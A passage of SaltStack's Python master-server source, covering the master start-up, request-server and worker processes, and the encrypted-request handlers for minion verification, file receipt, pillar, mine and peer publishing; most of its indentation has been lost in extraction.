"Invalid ext_pillar configuration. It is likely that the "
"external pillar type was not specified for one or more "
"external pillars."
)
if git_pillars:
try:
new_opts = copy.deepcopy(self.opts)
import salt.pillar.git_pillar
for repo in git_pillars:
new_opts["ext_pillar"] = [repo]
try:
git_pillar = salt.utils.gitfs.GitPillar(
new_opts,
repo["git"],
per_remote_overrides=salt.pillar.git_pillar.PER_REMOTE_OVERRIDES,
per_remote_only=salt.pillar.git_pillar.PER_REMOTE_ONLY,
global_only=salt.pillar.git_pillar.GLOBAL_ONLY,
)
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append(exc.strerror)
finally:
del new_opts
if errors or critical_errors:
for error in errors:
log.error(error)
for error in critical_errors:
log.critical(error)
log.critical("Master failed pre flight checks, exiting\n")
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
def start(self):
"""
Turn on the master server components
"""
self._pre_flight()
log.info("salt-master is starting as user '%s'", salt.utils.user.get_user())
enable_sigusr1_handler()
enable_sigusr2_handler()
self.__set_max_open_files()
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
# Setup the secrets here because the PubServerChannel may need
# them as well.
SMaster.secrets["aes"] = {
"secret": multiprocessing.Array(
ctypes.c_char,
salt.utils.stringutils.to_bytes(
salt.crypt.Crypticle.generate_key_string()
),
),
"reload": salt.crypt.Crypticle.generate_key_string,
}
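            # The AES secret above lives in a multiprocessing.Array so that
            # every child process started below shares one key buffer; the
            # "reload" callable regenerates it in place when Maintenance
            # rotates the key.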
log.info("Creating master process manager")
# Since there are children having their own ProcessManager we should wait for kill more time.
self.process_manager = salt.utils.process.ProcessManager(wait_for_kill=5)
pub_channels = []
log.info("Creating master publisher process")
log_queue = salt.log.setup.get_multiprocessing_logging_queue()
for _, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.pre_fork(self.process_manager, kwargs={"log_queue": log_queue})
pub_channels.append(chan)
log.info("Creating master event publisher process")
self.process_manager.add_process(
salt.utils.event.EventPublisher, args=(self.opts,)
)
if self.opts.get("reactor"):
if isinstance(self.opts["engines"], list):
rine = False
for item in self.opts["engines"]:
if "reactor" in item:
rine = True
break
if not rine:
self.opts["engines"].append({"reactor": {}})
else:
if "reactor" not in self.opts["engines"]:
log.info("Enabling the reactor engine")
self.opts["engines"]["reactor"] = {}
salt.engines.start_engines(self.opts, self.process_manager)
# must be after channels
log.info("Creating master maintenance process")
self.process_manager.add_process(Maintenance, args=(self.opts,))
if self.opts.get("event_return"):
log.info("Creating master event return process")
self.process_manager.add_process(
salt.utils.event.EventReturn, args=(self.opts,)
)
ext_procs = self.opts.get("ext_processes", [])
for proc in ext_procs:
log.info("Creating ext_processes process: %s", proc)
try:
mod = ".".join(proc.split(".")[:-1])
cls = proc.split(".")[-1]
_tmp = __import__(mod, globals(), locals(), [cls], -1)
cls = _tmp.__getattribute__(cls)
self.process_manager.add_process(cls, args=(self.opts,))
except Exception: # pylint: disable=broad-except
log.error("Error creating ext_processes process: %s", proc)
if HAS_HALITE and "halite" in self.opts:
log.info("Creating master halite process")
self.process_manager.add_process(Halite, args=(self.opts["halite"],))
# TODO: remove, or at least push into the transport stuff (pre-fork probably makes sense there)
if self.opts["con_cache"]:
log.info("Creating master concache process")
self.process_manager.add_process(
salt.utils.master.ConnectedCache, args=(self.opts,)
)
# workaround for issue #16315, race condition
log.debug("Sleeping for two seconds to let concache rest")
time.sleep(2)
log.info("Creating master request server process")
kwargs = {}
if salt.utils.platform.is_windows():
kwargs["log_queue"] = log_queue
kwargs[
"log_queue_level"
] = salt.log.setup.get_multiprocessing_logging_level()
kwargs["secrets"] = SMaster.secrets
self.process_manager.add_process(
ReqServer,
args=(self.opts, self.key, self.master_key),
kwargs=kwargs,
name="ReqServer",
)
self.process_manager.add_process(FileserverUpdate, args=(self.opts,))
# Fire up SSDP discovery publisher
if self.opts["discovery"]:
if salt.utils.ssdp.SSDPDiscoveryServer.is_available():
self.process_manager.add_process(
salt.utils.ssdp.SSDPDiscoveryServer(
port=self.opts["discovery"]["port"],
listen_ip=self.opts["interface"],
answer={
"mapping": self.opts["discovery"].get("mapping", {})
},
).run
)
else:
log.error("Unable to load SSDP: asynchronous IO is not available.")
if sys.version_info.major == 2:
log.error(
'You are using Python 2, please install "trollius" module to enable SSDP discovery.'
)
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
self.process_manager.run()
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
class Halite(salt.utils.process.SignalHandlingProcess):
"""
Manage the Halite server
"""
def __init__(self, hopts, **kwargs):
"""
Create a halite instance
:param dict hopts: The halite options
"""
super().__init__(**kwargs)
self.hopts = hopts
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self.__init__(
state["hopts"],
log_queue=state["log_queue"],
log_queue_level=state["log_queue_level"],
)
def __getstate__(self):
return {
"hopts": self.hopts,
"log_queue": self.log_queue,
"log_queue_level": self.log_queue_level,
}
def run(self):
"""
Fire up halite!
"""
salt.utils.process.appendproctitle(self.__class__.__name__)
halite.start(self.hopts)
class ReqServer(salt.utils.process.SignalHandlingProcess):
"""
Starts up the master request server, minions send results to this
interface.
"""
def __init__(self, opts, key, mkey, secrets=None, **kwargs):
"""
Create a request server
:param dict opts: The salt options dictionary
        :param dict key: The user starting the server and the AES key
        :param dict mkey: The user starting the server and the RSA key
:rtype: ReqServer
:returns: Request server
"""
super().__init__(**kwargs)
self.opts = opts
self.master_key = mkey
# Prepare the AES key
self.key = key
self.secrets = secrets
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self.__init__(
state["opts"],
state["key"],
state["mkey"],
secrets=state["secrets"],
log_queue=state["log_queue"],
log_queue_level=state["log_queue_level"],
)
def __getstate__(self):
return {
"opts": self.opts,
"key": self.key,
"mkey": self.master_key,
"secrets": self.secrets,
"log_queue": self.log_queue,
"log_queue_level": self.log_queue_level,
}
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self.destroy(signum)
super()._handle_signals(signum, sigframe)
def __bind(self):
"""
Binds the reply server
"""
if self.log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
if self.log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(self.log_queue_level)
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
if self.secrets is not None:
SMaster.secrets = self.secrets
dfn = os.path.join(self.opts["cachedir"], ".dfn")
if os.path.isfile(dfn):
try:
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
os.remove(dfn)
except os.error:
pass
        # Wait for kill should be less than the parent ProcessManager's.
self.process_manager = salt.utils.process.ProcessManager(
name="ReqServer_ProcessManager", wait_for_kill=1
)
req_channels = []
tcp_only = True
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.ReqServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
req_channels.append(chan)
if transport != "tcp":
tcp_only = False
kwargs = {}
if salt.utils.platform.is_windows():
kwargs["log_queue"] = self.log_queue
kwargs["log_queue_level"] = self.log_queue_level
# Use one worker thread if only the TCP transport is set up on
# Windows and we are using Python 2. There is load balancer
# support on Windows for the TCP transport when using Python 3.
if tcp_only and six.PY2 and int(self.opts["worker_threads"]) != 1:
log.warning(
"TCP transport supports only 1 worker on Windows "
"when using Python 2."
)
self.opts["worker_threads"] = 1
if self.opts["req_server_niceness"] and not salt.utils.platform.is_windows():
log.info(
"setting ReqServer_ProcessManager niceness to %d",
self.opts["req_server_niceness"],
)
os.nice(self.opts["req_server_niceness"])
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
for ind in range(int(self.opts["worker_threads"])):
name = "MWorker-{}".format(ind)
self.process_manager.add_process(
MWorker,
args=(self.opts, self.master_key, self.key, req_channels, name),
kwargs=kwargs,
name=name,
)
self.process_manager.run()
def run(self):
"""
Start up the ReqServer
"""
self.__bind()
def destroy(self, signum=signal.SIGTERM):
if hasattr(self, "process_manager"):
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
self.process_manager.kill_children()
# pylint: disable=W1701
def __del__(self):
self.destroy()
# pylint: enable=W1701
class MWorker(salt.utils.process.SignalHandlingProcess):
"""
The worker multiprocess instance to manage the backend operations for the
salt master.
"""
def __init__(self, opts, mkey, key, req_channels, name, **kwargs):
"""
Create a salt master worker process
:param dict opts: The salt options
        :param dict mkey: The user running the salt master and the RSA key
        :param dict key: The user running the salt master and the AES key
:rtype: MWorker
:return: Master worker
"""
kwargs["name"] = name
self.name = name
super().__init__(**kwargs)
self.opts = opts
self.req_channels = req_channels
self.mkey = mkey
self.key = key
self.k_mtime = 0
self.stats = collections.defaultdict(lambda: {"mean": 0, "runs": 0})
self.stat_clock = time.time()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
super().__init__(
log_queue=state["log_queue"], log_queue_level=state["log_queue_level"]
)
self.opts = state["opts"]
self.req_channels = state["req_channels"]
self.mkey = state["mkey"]
self.key = state["key"]
self.k_mtime = state["k_mtime"]
SMaster.secrets = state["secrets"]
def __getstate__(self):
return {
"opts": self.opts,
"req_channels": self.req_channels,
"mkey": self.mkey,
"key": self.key,
"k_mtime": self.k_mtime,
"secrets": SMaster.secrets,
"log_queue": self.log_queue,
"log_queue_level": self.log_queue_level,
}
def _handle_signals(self, signum, sigframe):
for channel in getattr(self, "req_channels", ()):
channel.close()
super()._handle_signals(signum, sigframe)
def __bind(self):
"""
Bind to the local port
"""
# using ZMQIOLoop since we *might* need zmq in there
install_zmq()
self.io_loop = ZMQDefaultLoop()
self.io_loop.make_current()
for req_channel in self.req_channels:
req_channel.post_fork(
self._handle_payload, io_loop=self.io_loop
) # TODO: cleaner? Maybe lazily?
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
# Tornado knows what to do
pass
@salt.ext.tornado.gen.coroutine
def _handle_payload(self, payload):
"""
The _handle_payload method is the key method used to figure out what
needs to be done with communication to the server
Example cleartext payload generated for 'salt myminion test.ping':
{'enc': 'clear',
'load': {'arg': [],
'cmd': 'publish',
'fun': 'test.ping',
'jid': '',
'key': 'alsdkjfa.,maljf-==adflkjadflkjalkjadfadflkajdflkj',
'kwargs': {'show_jid': False, 'show_timeout': False},
'ret': '',
'tgt': 'myminion',
'tgt_type': 'glob',
'user': 'root'}}
        :param dict payload: The payload to route to the appropriate handler
"""
key = payload["enc"]
load = payload["load"]
ret = {"aes": self._handle_aes, "clear": self._handle_clear}[key](load)
raise salt.ext.tornado.gen.Return(ret)
def _post_stats(self, start, cmd):
"""
Calculate the master stats and fire events with stat info
"""
end = time.time()
duration = end - start
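        # Running mean update: with n = runs (incremented by the caller before
        # the timed call), new_mean = (old_mean * (n - 1) + duration) / n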
self.stats[cmd]["mean"] = (
self.stats[cmd]["mean"] * (self.stats[cmd]["runs"] - 1) + duration
) / self.stats[cmd]["runs"]
if end - self.stat_clock > self.opts["master_stats_event_iter"]:
# Fire the event with the stats and wipe the tracker
self.aes_funcs.event.fire_event(
{
"time": end - self.stat_clock,
"worker": self.name,
"stats": self.stats,
},
tagify(self.name, "stats"),
)
self.stats = collections.defaultdict(lambda: {"mean": 0, "runs": 0})
self.stat_clock = end
def _handle_clear(self, load):
"""
Process a cleartext command
:param dict load: Cleartext payload
:return: The result of passing the load to a function in ClearFuncs corresponding to
the command specified in the load's 'cmd' key.
"""
log.trace("Clear payload received with command %s", load["cmd"])
cmd = load["cmd"]
method = self.clear_funcs.get_method(cmd)
if not method:
return {}, {"fun": "send_clear"}
if self.opts["master_stats"]:
start = time.time()
self.stats[cmd]["runs"] += 1
ret = method(load), {"fun": "send_clear"}
if self.opts["master_stats"]:
self._post_stats(start, cmd)
return ret
def _handle_aes(self, data):
"""
Process a command sent via an AES key
:param str load: Encrypted payload
:return: The result of passing the load to a function in AESFuncs corresponding to
the command specified in the load's 'cmd' key.
"""
if "cmd" not in data:
log.error("Received malformed command %s", data)
return {}
cmd = data["cmd"]
log.trace("AES payload received with command %s", data["cmd"])
method = self.aes_funcs.get_method(cmd)
if not method:
return {}, {"fun": "send"}
if self.opts["master_stats"]:
start = time.time()
self.stats[cmd]["runs"] += 1
def run_func(data):
return self.aes_funcs.run_func(data["cmd"], data)
with StackContext(
functools.partial(RequestContext, {"data": data, "opts": self.opts})
):
ret = run_func(data)
if self.opts["master_stats"]:
self._post_stats(start, cmd)
return ret
def run(self):
"""
Start a Master Worker
"""
salt.utils.process.appendproctitle(self.name)
# if we inherit req_server level without our own, reset it
if not salt.utils.platform.is_windows():
enforce_mworker_niceness = True
if self.opts["req_server_niceness"]:
if salt.utils.user.get_user() == "root":
log.info(
"%s decrementing inherited ReqServer niceness to 0", self.name
)
                    log.info("Current niceness: %d", os.nice(0))
os.nice(-1 * self.opts["req_server_niceness"])
else:
log.error(
"%s unable to decrement niceness for MWorker, not running as root",
self.name,
)
enforce_mworker_niceness = False
# else set what we're explicitly asked for
if enforce_mworker_niceness and self.opts["mworker_niceness"]:
log.info(
"setting %s niceness to %i",
self.name,
self.opts["mworker_niceness"],
)
os.nice(self.opts["mworker_niceness"])
        self.clear_funcs = ClearFuncs(self.opts, self.key)
self.aes_funcs = AESFuncs(self.opts)
salt.utils.crypt.reinit_crypto()
self.__bind()
class TransportMethods:
"""
Expose methods to the transport layer, methods with their names found in
the class attribute 'expose_methods' will be exposed to the transport layer
via 'get_method'.
"""
expose_methods = ()
def get_method(self, name):
"""
Get a method which should be exposed to the transport layer
"""
if name in self.expose_methods:
try:
return getattr(self, name)
except AttributeError:
log.error("Requested method not exposed: %s", name)
else:
log.error("Requested method not exposed: %s", name)
# TODO: rename? No longer tied to "AES", just "encrypted" or "private" requests
class AESFuncs(TransportMethods):
"""
Set up functions that are available when the load is encrypted with AES
"""
expose_methods = (
"verify_minion",
"_master_tops",
"_ext_nodes",
"_master_opts",
"_mine_get",
"_mine",
"_mine_delete",
"_mine_flush",
"_file_recv",
"_pillar",
"_minion_event",
"_handle_minion_event",
"_return",
"_syndic_return",
"minion_runner",
"pub_ret",
"minion_pub",
"minion_publish",
"revoke_auth",
"_serve_file",
"_file_find",
"_file_hash",
"_file_hash_and_stat",
"_file_list",
"_file_list_emptydirs",
"_dir_list",
"_symlink_list",
"_file_envs",
)
def __init__(self, opts):
"""
Create a new AESFuncs
:param dict opts: The salt options
:rtype: AESFuncs
:returns: Instance for handling AES operations
"""
self.opts = opts
self.event = salt.utils.event.get_master_event(
self.opts, self.opts["sock_dir"], listen=False
)
self.serial = salt.payload.Serial(opts)
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make a client
self.local = salt.client.get_local_client(self.opts["conf_file"])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(
self.opts, states=False, rend=False, ignore_config_errors=True
)
self.__setup_fileserver()
self.masterapi = salt.daemons.masterapi.RemoteFuncs(opts)
def __setup_fileserver(self):
"""
Set the local file objects from the file server interface
"""
# Avoid circular import
import salt.fileserver
self.fs_ = salt.fileserver.Fileserver(self.opts)
self._serve_file = self.fs_.serve_file
self._file_find = self.fs_._find_file
self._file_hash = self.fs_.file_hash
self._file_hash_and_stat = self.fs_.file_hash_and_stat
self._file_list = self.fs_.file_list
self._file_list_emptydirs = self.fs_.file_list_emptydirs
self._dir_list = self.fs_.dir_list
self._symlink_list = self.fs_.symlink_list
self._file_envs = self.fs_.file_envs
def __verify_minion(self, id_, token):
"""
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
"""
if not salt.utils.verify.valid_id(self.opts, id_):
return False
pub_path = os.path.join(self.opts["pki_dir"], "minions", id_)
try:
pub = salt.crypt.get_rsa_pub_key(pub_path)
except OSError:
log.warning(
"Salt minion claiming to be %s attempted to communicate with "
"master, but key could not be read and verification was denied.",
id_,
)
return False
        except (ValueError, IndexError, TypeError) as err:
            log.error('Unable to load public key "%s": %s', pub_path, err)
            return False
try:
if salt.crypt.public_decrypt(pub, token) == b"salt":
return True
except ValueError as err:
log.error("Unable to decrypt token: %s", err)
log.error(
"Salt minion claiming to be %s has attempted to communicate with "
"the master and could not be verified",
id_,
)
return False
def verify_minion(self, id_, token):
"""
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
"""
return self.__verify_minion(id_, token)
def __verify_minion_publish(self, clear_load):
"""
Verify that the passed information authorized a minion to execute
:param dict clear_load: A publication load from a minion
:rtype: bool
:return: A boolean indicating if the minion is allowed to publish the command in the load
"""
# Verify that the load is valid
if "peer" not in self.opts:
return False
if not isinstance(self.opts["peer"], dict):
return False
if any(
key not in clear_load for key in ("fun", "arg", "tgt", "ret", "tok", "id")
):
return False
# If the command will make a recursive publish don't run
if clear_load["fun"].startswith("publish."):
return False
# Check the permissions for this minion
if not self.__verify_minion(clear_load["id"], clear_load["tok"]):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning(
"Minion id %s is not who it says it is and is attempting "
"to issue a peer command",
clear_load["id"],
)
return False
clear_load.pop("tok")
perms = []
for match in self.opts["peer"]:
if re.match(match, clear_load["id"]):
# This is the list of funcs/modules!
if isinstance(self.opts["peer"][match], list):
perms.extend(self.opts["peer"][match])
if "," in clear_load["fun"]:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load["fun"] = clear_load["fun"].split(",")
arg_ = []
for arg in clear_load["arg"]:
arg_.append(arg.split())
clear_load["arg"] = arg_
# finally, check the auth of the load
return self.ckminions.auth_check(
perms,
clear_load["fun"],
clear_load["arg"],
clear_load["tgt"],
clear_load.get("tgt_type", "glob"),
publish_validate=True,
)
def __verify_load(self, load, verify_keys):
"""
A utility function to perform common verification steps.
:param dict load: A payload received from a minion
:param list verify_keys: A list of strings that should be present in a
given load
        :rtype: dict | bool
        :return: The original load (minus the token) if the load can be
            verified, otherwise False.
"""
if any(key not in load for key in verify_keys):
return False
if "tok" not in load:
log.error(
"Received incomplete call from %s for '%s', missing '%s'",
load["id"],
inspect_stack()["co_name"],
"tok",
)
return False
if not self.__verify_minion(load["id"], load["tok"]):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning("Minion id %s is not who it says it is!", load["id"])
return False
if "tok" in load:
load.pop("tok")
return load
def _master_tops(self, load):
"""
Return the results from an external node classifier if one is
specified
:param dict load: A payload received from a minion
:return: The results from an external node classifier
"""
load = self.__verify_load(load, ("id", "tok"))
if load is False:
return {}
return self.masterapi._master_tops(load, skip_verify=True)
# Needed so older minions can request master_tops
_ext_nodes = _master_tops
def _master_opts(self, load):
"""
Return the master options to the minion
:param dict load: A payload received from a minion
:rtype: dict
:return: The master options
"""
mopts = {}
file_roots = {}
envs = self._file_envs()
for saltenv in envs:
if saltenv not in file_roots:
file_roots[saltenv] = []
mopts["file_roots"] = file_roots
mopts["top_file_merging_strategy"] = self.opts["top_file_merging_strategy"]
mopts["env_order"] = self.opts["env_order"]
mopts["default_top"] = self.opts["default_top"]
if load.get("env_only"):
return mopts
mopts["renderer"] = self.opts["renderer"]
mopts["failhard"] = self.opts["failhard"]
mopts["state_top"] = self.opts["state_top"]
mopts["state_top_saltenv"] = self.opts["state_top_saltenv"]
mopts["nodegroups"] = self.opts["nodegroups"]
mopts["state_auto_order"] = self.opts["state_auto_order"]
mopts["state_events"] = self.opts["state_events"]
mopts["state_aggregate"] = self.opts["state_aggregate"]
mopts["jinja_env"] = self.opts["jinja_env"]
mopts["jinja_sls_env"] = self.opts["jinja_sls_env"]
mopts["jinja_lstrip_blocks"] = self.opts["jinja_lstrip_blocks"]
mopts["jinja_trim_blocks"] = self.opts["jinja_trim_blocks"]
return mopts
def _mine_get(self, load):
"""
Gathers the data from the specified minions' mine
:param dict load: A payload received from a minion
:rtype: dict
:return: Mine data from the specified minions
"""
load = self.__verify_load(load, ("id", "tgt", "fun", "tok"))
if load is False:
return {}
else:
return self.masterapi._mine_get(load, skip_verify=True)
def _mine(self, load):
"""
Store the mine data
:param dict load: A payload received from a minion
:rtype: bool
:return: True if the data has been stored in the mine
"""
load = self.__verify_load(load, ("id", "data", "tok"))
if load is False:
return {}
return self.masterapi._mine(load, skip_verify=True)
def _mine_delete(self, load):
"""
Allow the minion to delete a specific function from its own mine
:param dict load: A payload received from a minion
:rtype: bool
:return: Boolean indicating whether or not the given function was deleted from the mine
"""
load = self.__verify_load(load, ("id", "fun", "tok"))
if load is False:
return {}
else:
return self.masterapi._mine_delete(load)
def _mine_flush(self, load):
"""
Allow the minion to delete all of its own mine contents
:param dict load: A payload received from a minion
"""
load = self.__verify_load(load, ("id", "tok"))
if load is False:
return {}
else:
return self.masterapi._mine_flush(load, skip_verify=True)
def _file_recv(self, load):
"""
        Allows minions to send files to the master; files are stored in the
        master file cache
"""
        if any(key not in load for key in ("id", "path", "loc", "data")):
return False
if not isinstance(load["path"], list):
return False
if not self.opts["file_recv"]:
return False
if not salt.utils.verify.valid_id(self.opts, load["id"]):
return False
file_recv_max_size = 1024 * 1024 * self.opts["file_recv_max_size"]
if "loc" in load and load["loc"] < 0:
log.error("Invalid file pointer: load[loc] < 0")
return False
if len(load["data"]) + load.get("loc", 0) > file_recv_max_size:
log.error(
"file_recv_max_size limit of %d MB exceeded! %s will be "
"truncated. To successfully push this file, adjust "
"file_recv_max_size to an integer (in MB) large enough to "
"accommodate it.",
file_recv_max_size,
load["path"],
)
return False
if "tok" not in load:
log.error(
"Received incomplete call from %s for '%s', missing '%s'",
load["id"],
inspect_stack()["co_name"],
"tok",
)
return False
if not self.__verify_minion(load["id"], load["tok"]):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning("Minion id %s is not who it says it is!", load["id"])
return {}
load.pop("tok")
# Join path
sep_path = os.sep.join(load["path"])
# Path normalization should have been done by the sending
# minion but we can't guarantee it. Re-do it here.
normpath = os.path.normpath(sep_path)
        # Ensure that this safety check is done after the path
        # has been normalized.
if os.path.isabs(normpath) or "../" in load["path"]:
# Can overwrite master files!!
return False
cpath = os.path.join(
self.opts["cachedir"], "minions", load["id"], "files", normpath
)
# One last safety check here
if not os.path.normpath(cpath).startswith(self.opts["cachedir"]):
log.warning(
"Attempt to write received file outside of master cache "
"directory! Requested path: %s. Access denied.",
cpath,
)
return False
cdir = os.path.dirname(cpath)
if not os.path.isdir(cdir):
try:
os.makedirs(cdir)
            except OSError:
pass
if os.path.isfile(cpath) and load["loc"] != 0:
mode = "ab"
else:
mode = "wb"
with salt.utils.files.fopen(cpath, mode) as fp_:
if load["loc"]:
fp_.seek(load["loc"])
fp_.write(salt.utils.stringutils.to_bytes(load["data"]))
return True
def _pillar(self, load):
"""
Return the pillar data for the minion
:param dict load: Minion payload
:rtype: dict
:return: The pillar data for the minion
"""
if any(key not in load for key in ("id", "grains")):
return False
if not salt.utils.verify.valid_id(self.opts, load["id"]):
return False
load["grains"]["id"] = load["id"]
pillar = salt.pillar.get_pillar(
self.opts,
load["grains"],
load["id"],
load.get("saltenv", load.get("env")),
ext=load.get("ext"),
pillar_override=load.get("pillar_override", {}),
pillarenv=load.get("pillarenv"),
extra_minion_data=load.get("extra_minion_data"),
)
data = pillar.compile_pillar()
self.fs_.update_opts()
if self.opts.get("minion_data_cache", False):
self.masterapi.cache.store(
"minions/{}".format(load["id"]),
"data",
{"grains": load["grains"], "pillar": data},
)
if self.opts.get("minion_data_cache_events") is True:
self.event.fire_event(
{"Minion data cache refresh": load["id"]},
tagify(load["id"], "refresh", "minion"),
)
return data
def _minion_event(self, load):
"""
Receive an event from the minion and fire it on the master event
interface
:param dict load: The minion payload
"""
load = self.__verify_load(load, ("id", "tok"))
if load is False:
return {}
# Route to master event bus
self.masterapi._minion_event(load)
# Process locally
self._handle_minion_event(load)
def _handle_minion_event(self, load):
"""
Act on specific events from minions
"""
id_ = load["id"]
if load.get("tag", "") == "_salt_error":
log.error(
"Received minion error from [%s]: %s", id_, load["data"]["message"]
)
for event in load.get("events", []):
event_data = event.get("data", {})
if "minions" in event_data:
jid = event_data.get("jid")
if not jid:
continue
minions = event_data["minions"]
try:
salt.utils.job.store_minions(
self.opts, jid, minions, mminion=self.mminion, syndic_id=id_
)
except (KeyError, salt.exceptions.SaltCacheError) as exc:
log.error(
"Could not add minion(s) %s for job %s: %s", minions, jid, exc
)
def _return(self, load):
"""
Handle the return data sent from the minions.
Takes the return, verifies it and fires it on the master event bus.
Typically, this event is consumed by the Salt CLI waiting on the other
end of the event bus but could be heard by any listener on the bus.
:param dict load: The minion payload
"""
if self.opts["require_minion_sign_messages"] and "sig" not in load:
log.critical(
"_return: Master is requiring minions to sign their "
"messages, but there is no signature in this payload from "
"%s.",
load["id"],
)
return False
if "sig" in load:
log.trace("Verifying signed event publish from minion")
sig = load.pop("sig")
this_minion_pubkey = os.path.join(
self.opts["pki_dir"], "minions/{}".format(load["id"])
)
serialized_load = salt.serializers.msgpack.serialize(load)
if not salt.crypt.verify_signature(
this_minion_pubkey, serialized_load, sig
):
log.info("Failed to verify event signature from minion %s.", load["id"])
if self.opts["drop_messages_signature_fail"]:
log.critical(
"drop_messages_signature_fail is enabled, dropping "
"message from %s",
load["id"],
)
return False
else:
                    log.info(
                        "But 'drop_messages_signature_fail' is disabled, so message is still accepted."
                    )
load["sig"] = sig
try:
salt.utils.job.store_job(
self.opts, load, event=self.event, mminion=self.mminion
)
except salt.exceptions.SaltCacheError:
log.error("Could not store job information for load: %s", load)
def _syndic_return(self, load):
"""
Receive a syndic minion return and format it to look like returns from
individual minions.
:param dict load: The minion payload
"""
loads = load.get("load")
if not isinstance(loads, list):
loads = [load] # support old syndics not aggregating returns
for load in loads:
# Verify the load
if any(key not in load for key in ("return", "jid", "id")):
continue
# if we have a load, save it
if load.get("load"):
fstr = "{}.save_load".format(self.opts["master_job_cache"])
self.mminion.returners[fstr](load["jid"], load["load"])
# Register the syndic
syndic_cache_path = os.path.join(
self.opts["cachedir"], "syndics", load["id"]
)
if not os.path.exists(syndic_cache_path):
path_name = os.path.split(syndic_cache_path)[0]
if not os.path.exists(path_name):
os.makedirs(path_name)
with salt.utils.files.fopen(syndic_cache_path, "w") as wfh:
wfh.write("")
# Format individual return loads
for key, item in load["return"].items():
ret = {"jid": load["jid"], "id": key}
ret.update(item)
if "master_id" in load:
ret["master_id"] = load["master_id"]
if "fun" in load:
ret["fun"] = load["fun"]
if "arg" in load:
ret["fun_args"] = load["arg"]
if "out" in load:
ret["out"] = load["out"]
if "sig" in load:
ret["sig"] = load["sig"]
self._return(ret)
def minion_runner(self, clear_load):
"""
Execute a runner from a minion, return the runner's function data
:param dict clear_load: The minion payload
:rtype: dict
:return: The runner function data
"""
load = self.__verify_load(clear_load, ("fun", "arg", "id", "tok"))
if load is False:
return {}
else:
return self.masterapi.minion_runner(clear_load)
def pub_ret(self, load):
"""
        Request the return data from a specific jid, only allowed
        if the requesting minion also initiated the execution.
:param dict load: The minion payload
:rtype: dict
:return: Return data corresponding to a given JID
"""
load = self.__verify_load(load, ("jid", "id", "tok"))
if load is False:
return {}
# Check that this minion can access this data
auth_cache = os.path.join(self.opts["cachedir"], "publish_auth")
if not os.path.isdir(auth_cache):
os.makedirs(auth_cache)
jid_fn = os.path.join(auth_cache, str(load["jid"]))
with salt.utils.files.fopen(jid_fn, "r") as fp_:
if not load["id"] == fp_.read():
return {}
# Grab the latest and return
return self.local.get_cache_returns(load["jid"])
def minion_pub(self, clear_load):
"""
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
        .. code-block:: yaml
peer:
.*:
- .*
This configuration will enable all minions to execute all commands:
        .. code-block:: yaml
peer:
foo.example.com:
- test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
        :param dict clear_load: The minion payload
"""
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_pub(clear_load)
def minion_publish(self, clear_load):
"""
Publish a command initiated from a minion, this method executes minion
restrictions so that the minion publication will only work if it is
enabled in the config.
The configuration on the master allows minions to be matched to
salt functions, so the minions can only publish allowed salt functions
The config will look like this:
        .. code-block:: yaml
            peer:
                .*:
                    - .*
        This configuration will enable all minions to execute all commands:
        .. code-block:: yaml
            peer:
                foo.example.com:
                    - test.*
The above configuration will only allow the minion foo.example.com to
execute commands from the test module.
:param dict clear_load: The minion payload
"""
if not self.__verify_minion_publish(clear_load):
return {}
else:
return self.masterapi.minion_publish(clear_load)
def revoke_auth(self, load):
"""
